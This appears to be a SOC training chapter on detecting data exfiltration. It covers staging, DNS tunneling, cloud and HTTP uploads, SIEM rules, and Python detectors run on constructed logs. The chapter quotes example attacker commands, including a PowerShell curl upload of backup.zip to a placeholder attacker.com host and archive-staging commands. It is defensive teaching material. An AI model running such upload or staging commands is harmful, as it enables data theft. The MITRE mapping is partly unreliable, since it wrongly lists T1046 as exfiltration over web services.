Data Exfiltration

Data exfiltration is the unauthorized transfer of sensitive data from inside an organization to an external location controlled by an attacker.
It is one of the final and most critical stages of an intrusion, often following privilege escalation, credential theft, and lateral movement.
SOC analysts must detect exfiltration attempts early because once data leaves the network, impact becomes severe and often irreversible.

This chapter explains data exfiltration in full-scale SOC depth, including detection techniques, log analysis, network indicators, endpoint behaviors, protocols used for exfiltration, and practical detection strategies inside SIEM and EDR.


What Data Exfiltration Looks Like in Real Attacks

Attackers exfiltrate data through:

  • HTTP/HTTPS uploads

  • DNS tunneling

  • SMTP exfiltration

  • FTP/SFTP transfers

  • Cloud uploads (Dropbox, Google Drive, OneDrive)

  • TOR hidden services

  • C2 channels

  • Encrypted tunnels

  • Custom malware protocols

  • Public file-sharing sites

  • Slack/Telegram/Discord bots

Even normal protocols can hide malicious transfers if not analyzed carefully.


Data Exfiltration Stages

Stage 1 — Data Collection

Attacker accesses:

  • File servers

  • Databases

  • Shared drives

  • Email inboxes

  • Cloud storage

  • Business apps

Indicators include:

  • Unexpected access

  • Large volume reads

  • Access from unusual accounts


Stage 2 — Data Staging

Attackers prepare data to be sent out.

Staging locations:

  • %TEMP%

  • %APPDATA%

  • Desktop zip files

  • User profile folders

  • /tmp/

  • Hidden directories

Common staging behavior:

  • Creation of large ZIP/RAR files

  • Use of 7z.exe, rar.exe, zip.exe

  • File splitting (*.part01, *.part02)

  • Data encoding (Base64 files)

Example command spotted in logs:

7z.exe a C:\Users\Public\backup.zip C:\Finance\*.xlsx

Stage 3 — Exfiltration

Data is transferred externally.

Indicators include:

  • High outbound traffic

  • Connections to unfamiliar IPs

  • Unusual POST requests

  • Large DNS request sizes

  • FTP uploads

  • Cloud sync activity on servers

  • TOR usage

  • Continuous beaconing with large payloads

Example:

powershell.exe → upload via HTTPS to attacker domain

Common Methods Attackers Use for Data Exfiltration

1. HTTP/HTTPS Uploads

This is the most common method: attackers send data via POST requests to attacker-controlled domains.

Logs show:

  • Large POST bodies

  • Frequent POST requests

  • Unusual user agents

Example:

10MB POST request to sync-update-info.net/upload

2. DNS Tunneling

Data is encoded inside DNS requests, typically in the subdomain labels of queries to an attacker-controlled zone.

Indicators:

  • Long DNS queries

  • High frequency DNS traffic

  • Base32/Base64 patterns

  • DNS requests to unusual subdomains

Example:

ajdks7329sd9s9alsd.domain.com

3. Cloud Storage Abuse

Attackers use legitimate services.

Examples:

  • Dropbox

  • Google Drive

  • OneDrive

  • Mega

  • iCloud

Indicators:

  • Unusual cloud sync from servers

  • Large outbound to cloud IP ranges

4. Email Exfiltration

Attackers send data to external email accounts.

Indicators:

  • Large attachments

  • Emails from servers that normally don’t send mail

5. Encrypted Channels

Attackers use:

  • SSH

  • VPNs

  • Custom TLS tunnels

  • C2 frameworks (Cobalt Strike, Sliver)

Indicators:

  • Outbound encryption from unexpected hosts

6. File Transfer Protocols

  • FTP

  • SFTP

  • SCP

Indicators:

  • FTP on uncommon ports

  • Auth attempts from compromised accounts

7. Messaging Platforms

Exfiltration via:

  • Telegram bots

  • Slack webhooks

  • Discord API

Indicators:

  • Connections to messaging API endpoints


Detecting Data Exfiltration Using Logs

Windows Event Logs

Detect staging:

  • File creation in unusual directories

  • Archive creation

  • Large file modifications

  • Executions of compression tools

Example (Sysmon Process Create):

EventID 1 → 7z.exe creating backup.zip

Linux Audit Logs

Detect:

  • Tar/Gzip usage

  • SSH outbound

  • SCP uploads

  • Access to sensitive directories

Example:

tar -czf /tmp/data.tar.gz /etc/passwd

Detecting Data Exfiltration Using Network Logs

Firewalls / Proxy Logs

Look for:

  • Large outbound traffic

  • POST uploads

  • Unknown IPs

  • Suspicious user agents

  • Traffic outside business hours

Example:

500MB upload to 185.44.22.11

DNS Logs

Detect:

  • Large DNS packet sizes

  • Excessive queries

  • Encoded data patterns


Detecting Data Exfiltration With EDR

Indicators include:

  • Execution of compression tools

  • PowerShell upload scripts

  • Curl/Wget commands

  • Encoded blobs

Example:

powershell.exe curl -F "file=@backup.zip" https://attacker.com/upload

EDR Behavioral Alerts

  • Suspicious network connections

  • Unusual process paths

  • Abnormal data transfers

  • Script engines initiating uploads


MITRE ATT&CK Mapping

Data Exfiltration techniques include:

  • T1041: Exfiltration over C2 channel

  • T1048: Exfiltration over alternative protocol

  • T1046: Exfiltration over web services

  • T1020: Automated exfiltration

  • T1567: Exfiltration to cloud storage

  • T1071: Application layer protocols

  • T1132: Data encoding

These mappings help detection engineers build accurate rules.


SIEM Detection Queries (Practical)

Detect Large Outbound Transfers

bytes_out > 50000000 AND dest NOT IN whitelist

Detect Suspicious POST Uploads

http.method=POST AND body_bytes > 2000000
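The two rules above (large outbound volume to a non-allowlisted destination, and oversized POST bodies) implemented over proxy log lines, as an added example that is not part of the original chapter. The log format, the allowlist, the business-hours window and the sample lines are all constructed here; sync-update-info.net is the chapter's own example domain.

```python
from collections import defaultdict
from datetime import datetime

# Constructed proxy log lines (not from the page): time src dst method bytes_out user_agent.
SAMPLE_PROXY_LOG = """\
2024-03-01T14:02:11Z 10.0.0.5 www.example.com GET 512 Mozilla/5.0
2024-03-01T23:15:09Z 10.0.0.5 sync-update-info.net POST 10485760 python-requests/2.31
2024-03-01T23:15:40Z 10.0.0.5 sync-update-info.net POST 10485760 python-requests/2.31
2024-03-01T23:16:02Z 10.0.0.5 sync-update-info.net POST 31457280 python-requests/2.31
2024-03-01T10:30:00Z 10.0.0.8 updates.example.com POST 3145728 Mozilla/5.0
"""

ALLOWLIST = {"www.example.com", "updates.example.com"}  # assumed known-good destinations
LARGE_TOTAL = 50_000_000       # bytes_out > 50000000 AND dest NOT IN whitelist
LARGE_POST = 2_000_000         # http.method=POST AND body_bytes > 2000000
BUSINESS_HOURS = range(8, 18)  # assumption: 08:00-17:59 UTC is normal activity


def parse_proxy_line(line):
    ts, src, dst, method, bytes_out, ua = line.split(maxsplit=5)
    return {"ts": datetime.fromisoformat(ts.replace("Z", "+00:00")), "src": src,
            "dst": dst, "method": method, "bytes_out": int(bytes_out), "ua": ua}


def analyze_proxy(log_text):
    """Return (rule, src, dst, bytes) tuples for the per-request and per-pair rules."""
    findings = []
    totals = defaultdict(int)
    for line in log_text.splitlines():
        r = parse_proxy_line(line)
        totals[(r["src"], r["dst"])] += r["bytes_out"]
        if r["method"] == "POST" and r["bytes_out"] > LARGE_POST:
            # Same match as the page's POST rule; the extra tags only add the
            # out-of-hours and non-browser user-agent context an analyst checks next.
            tags = ["large_post"]
            if r["ts"].hour not in BUSINESS_HOURS:
                tags.append("off_hours")
            if not r["ua"].startswith("Mozilla/"):
                tags.append("non_browser_ua")
            findings.append(("+".join(tags), r["src"], r["dst"], r["bytes_out"]))
    # Volume rule: sum per (source, destination) so three 10-30 MB uploads still trip it.
    for (src, dst), total in totals.items():
        if total > LARGE_TOTAL and dst not in ALLOWLIST:
            findings.append(("large_total", src, dst, total))
    return findings
```

Summing per source/destination pair matters because a single-request threshold misses an upload that was split into several smaller POSTs.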

Detect DNS Tunneling

dns.query_length > 60 OR count(dns.requests) > threshold
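The DNS tunneling rule above, together with the indicators listed under "DNS Tunneling" and "DNS Logs" (long queries, encoded labels, high query frequency), as an added example rather than code from the chapter. It runs over constructed resolver log lines, and the registered-domain helper simply takes the last two labels, an assumption that a real deployment would replace with a public-suffix lookup.

```python
import math
from collections import Counter, defaultdict

# Constructed sample resolver log lines (not from the page): time client qtype qname.
# The three long TXT names mimic base32-encoded chunks of a file being tunnelled out.
SAMPLE_DNS_LOG = """\
2024-03-01T02:10:01Z 10.0.0.5 A www.example.com
2024-03-01T02:10:02Z 10.0.0.5 TXT mfrggzdfmztwq2lknnwg23tpobyxe43uov3ho6dzpi4kzlbxw.exfil-tunnel.net
2024-03-01T02:10:02Z 10.0.0.5 TXT ge3dgnbvgy3tqojqgeydcmrrgizdcnjwg43dknjy2aqmwxyz.exfil-tunnel.net
2024-03-01T02:10:03Z 10.0.0.5 TXT nbswy3dpfqqhg33nmvsgk2lsmfuwk5dfomxe43u3b2pl7kqa.exfil-tunnel.net
2024-03-01T02:10:05Z 10.0.0.7 A mail.example.com
"""


def shannon_entropy(label):
    """Bits per character: encoded data scores high, hostnames like 'www' score low."""
    if not label:
        return 0.0
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in Counter(label).values())


def registered_domain(qname):
    # Assumption: the last two labels approximate the registered domain (no PSL lookup).
    return ".".join(qname.rstrip(".").split(".")[-2:])


def analyze_dns(log_text, max_len=60, min_label=20, min_entropy=3.5, max_queries=2):
    """Apply the page's two DNS rules (query length, query count) plus an entropy check."""
    findings = []
    per_client_domain = defaultdict(int)
    for line in log_text.splitlines():
        _ts, client, _qtype, qname = line.split()
        per_client_domain[(client, registered_domain(qname))] += 1
        first_label = qname.split(".")[0]
        if len(qname) > max_len:                       # dns.query_length > 60
            findings.append(("long_query", client, qname))
        if len(first_label) >= min_label and shannon_entropy(first_label) >= min_entropy:
            findings.append(("encoded_label", client, qname))
    for (client, domain), count in per_client_domain.items():
        if count > max_queries:                        # count(dns.requests) > threshold
            findings.append(("query_burst", client, f"{domain} x{count}"))
    return findings


if __name__ == "__main__":
    for finding in analyze_dns(SAMPLE_DNS_LOG):
        print(*finding)
```

Counting queries per client and registered domain, rather than per exact name, is what catches a tunnel, since every chunk uses a different subdomain.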

Detect File Compression Tools Usage

process_name IN ("7z.exe", "rar.exe", "zip.exe")
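The compression-tool rule above matches every 7z/rar/zip launch, which is noisy; the added example below, which is not part of the chapter, scores Sysmon Event ID 1 events using the staging behaviours described under "Stage 2 — Data Staging" (archive creation, staging directories, file splitting) so that routine extraction is ignored. The event dicts, the sensitive share names and the score weights are constructed assumptions; the first CommandLine is the chapter's own example.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon Event ID 1 (process create) events, not from the page, except the
# first CommandLine, which is the chapter's own staging example.
SAMPLE_EVENTS = [
    {"UtcTime": "2024-03-01 02:05:10", "User": "CORP\\svc-backup", "Image": r"C:\Tools\7z.exe",
     "CommandLine": r"7z.exe a C:\Users\Public\backup.zip C:\Finance\*.xlsx"},
    {"UtcTime": "2024-03-01 09:12:44", "User": "CORP\\alice",
     "Image": r"C:\Program Files\7-Zip\7z.exe",
     "CommandLine": r'"C:\Program Files\7-Zip\7z.exe" x C:\Users\alice\Downloads\driver.zip'},
    {"UtcTime": "2024-03-01 02:07:30", "User": "CORP\\svc-backup",
     "Image": r"C:\Program Files\WinRAR\Rar.exe",
     "CommandLine": r"Rar.exe a -v100m C:\Users\bob\AppData\Roaming\out.rar D:\HR\*"},
]

COMPRESSION_TOOLS = {"7z.exe", "rar.exe", "zip.exe", "winrar.exe"}  # page's process list
FIRST_ARG = re.compile(r'^(?:"[^"]*"|\S+)\s+(\S+)')                 # verb after the image
STAGING_DIR = re.compile(r"\\(Users\\Public|AppData|Temp|Desktop)\\", re.I)
SENSITIVE_SRC = re.compile(r"\\(Finance|HR|Legal)\\", re.I)         # assumed sensitive shares
SPLIT_VOLUMES = re.compile(r"(\s-v\d+[kmg]?\b|\.part\d+)", re.I)    # *.part01-style splitting


def score_event(ev):
    """Score one process-create event; 0 means no compression tool was involved."""
    if PureWindowsPath(ev["Image"]).name.lower() not in COMPRESSION_TOOLS:
        return 0, []
    cmd = ev["CommandLine"]
    reasons = []
    m = FIRST_ARG.match(cmd)
    if m and m.group(1).lower() == "a":          # 'a' = add to archive; x/e = extract
        reasons.append(("archive_create", 2))
    if STAGING_DIR.search(cmd):
        reasons.append(("staging_dir", 2))
    if SENSITIVE_SRC.search(cmd):
        reasons.append(("sensitive_source", 2))
    if SPLIT_VOLUMES.search(cmd):
        reasons.append(("split_volumes", 1))
    return sum(w for _, w in reasons), [r for r, _ in reasons]


def find_staging(events, threshold=4):
    """Return (UtcTime, User, score, reasons) for events scoring at or above threshold."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append((ev["UtcTime"], ev["User"], score, reasons))
    return alerts
```

The reasons list is what an analyst pivots on next: an archive created in a staging directory from a sensitive share should be correlated with the outbound proxy and DNS findings for the same host.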

Detect Cloud Storage Access From Servers

dest_domain IN ("dropbox.com", "drive.google.com") AND host_category = "server"

Real SOC Case Examples

Example 1 — Ransomware Gang Exfiltration

EDR shows:

7z.exe → backup.7z → outbound HTTPS to 91.22.113.10

Firewall logs confirm a 1.2 GB upload.

Example 2 — Insider Exfiltration

Proxy logs:

POST to WeTransfer with a 300 MB file

User had no business need.

Example 3 — DNS Tunneling Malware

DNS logs show:

  • 10k+ DNS requests

  • Long encoded subdomain names

Investigation revealed a backdoor.

Example 4 — Cloud Abuse on Linux Server

Outbound:

AWS S3 upload from a finance server at 3 AM

Confirmed compromise.


Intel Dump

  • Data exfiltration is the unauthorized external transfer of sensitive data.

  • Attackers stage data using compression tools and hidden directories.

  • Exfiltration methods include HTTP uploads, DNS tunneling, FTP/SFTP, email, cloud storage, TOR, and encrypted tunnels.

  • Detect using Windows/Linux logs, EDR telemetry, firewall logs, proxy, and DNS analysis.

  • Key indicators include large outbound traffic, unusual POST requests, long DNS queries, cloud uploads from servers, compression tool usage, and encoded PowerShell commands.

  • SIEM rules must detect abnormal data volumes, suspicious protocols, cloud access anomalies, and staging behavior.
